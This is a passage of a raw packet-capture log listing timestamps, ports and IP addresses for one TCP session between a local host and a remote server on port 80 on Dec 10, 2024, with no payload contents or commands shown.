Dec 10, 2024 00:42:38.387743950 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.387842894 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.387890100 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.388793945 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.388843060 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.388892889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.388938904 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.389879942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.389933109 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.390130043 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.390180111 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.390996933 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.391043901 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.391068935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.391118050 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.392066002 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.392170906 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.392195940 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.392215967 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.393155098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.393205881 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.393371105 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.393414974 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.394284964 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.394355059 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.394381046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.394424915 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.395436049 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.395519018 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.395538092 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.395617962 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.396472931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.396528006 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.396595955 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.396641970 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.397557974 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.397617102 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.397663116 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.397713900 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.398653984 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.398706913 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.398780107 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.398828030 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.399739027 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.399799109 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.399816036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.399935961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.400823116 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.400870085 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.401021004 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.401067972 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.401968002 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.402026892 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.402101040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.402148962 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.403024912 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.403080940 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.403120995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.403171062 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.404119015 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.404162884 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.404239893 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.404284000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.405215979 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.405314922 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.405358076 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.405402899 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.406297922 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.406347990 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.406405926 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.406450033 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.407416105 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.407434940 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.407463074 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.407484055 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.408499956 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.408550024 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.408584118 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.408626080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.409610987 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.409658909 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.409729004 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.409779072 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.410710096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.410759926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.410805941 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.410854101 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.411801100 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.411849022 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.411961079 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.412005901 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.412888050 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.412936926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.413013935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.413059950 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.413991928 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.414040089 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.414127111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.414174080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.415086985 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.415133953 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.415198088 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.415246964 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.416161060 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.416208982 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.416290045 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.416333914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.417309999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.417352915 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.417360067 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.417390108 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.418345928 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.418390989 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.418461084 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.418509007 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.419462919 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.419509888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.419603109 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.419646978 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.420564890 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.420583010 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.420610905 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.420623064 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.421663046 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.421715021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.421715021 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.421760082 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.534050941 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.534120083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.534332991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.534383059 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.534657001 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.534703016 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.534965992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.535012960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.535701990 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.535748959 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.535866976 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.535912991 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.536778927 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.536825895 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.560965061 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.561049938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.561091900 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.561139107 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.561431885 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.561481953 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.561661005 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.561714888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.561768055 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.561846972 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.562751055 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.562798977 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.562822104 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.562864065 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.563843012 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.563886881 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.563955069 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.563998938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.564997911 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.565049887 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.565140009 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.566030979 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.566078901 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.566102028 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.567126989 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.567176104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.567233086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.567276001 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.568244934 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.568375111 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.568423033 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.569335938 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.569428921 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.569477081 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.570420027 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.570539951 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.570588112 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.571507931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.571558952 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.571626902 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.572607040 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.572659969 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.572725058 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.573051929 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.573714018 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.573816061 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.573869944 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.574795008 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.574920893 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.574975967 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.575896025 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.575948954 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.575993061 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.576960087 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.577008963 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.577048063 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.578090906 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.578141928 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.578268051 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.578318119 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.579194069 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.579237938 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.579286098 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.580317974 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.580408096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.580471039 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.581371069 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.581559896 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.581619978 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.582474947 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.582571030 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.582633972 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.583554983 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.583666086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.583717108 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.584635973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.584682941 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.584764957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.585056067 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.585757017 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.585803986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.585858107 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.585900068 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.586853981 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.586901903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.587001085 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.587049961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.587949991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.588057995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.588109016 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.589061022 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.589163065 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.589212894 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.590141058 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.590188980 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.590204000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.591228008 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.591283083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.591320992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.592338085 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.592382908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.592447996 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.593044996 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.593413115 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.593570948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.593611956 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.594515085 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.594645023 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.594691992 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.595630884 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.595694065 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.595705986 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.596721888 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.596795082 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.596832037 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.597059011 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.597817898 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.597918034 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.597975016 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.598885059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.599029064 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.599086046 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.600045919 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.600203037 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.600265980 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.601135015 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.601249933 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.601310015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.602180958 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.602266073 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.602296114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.603280067 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.603338003 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.603476048 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.604371071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.604418039 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.604479074 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.605051994 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.605467081 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.605571985 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.605622053 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.606583118 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.606646061 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.606699944 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.607669115 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.607717037 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.607757092 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.608963013 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.609010935 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.609060049 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.609869957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.609920979 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.609946012 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.609989882 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.610949993 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.611057043 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.611099005 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.612031937 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.612077951 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.612163067 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.612207890 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.613182068 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.613291025 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.613338947 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.614229918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.614295006 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.614312887 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.614372015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.726190090 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.726257086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.726298094 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.726335049 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.726505041 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.726620913 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.726634979 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.726654053 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.727612972 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.727632999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.727660894 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.727674007 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.728693962 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.728781939 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.728806973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.729058981 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.753388882 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.753525019 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.753587008 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.753659964 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.753959894 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.754017115 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.754103899 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.754147053 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.755048037 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.755125999 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.755217075 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.755263090 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:38.756129026 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.756226063 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:38.756259918 CET	49759	80	192.168.2.4	185.215.113.16
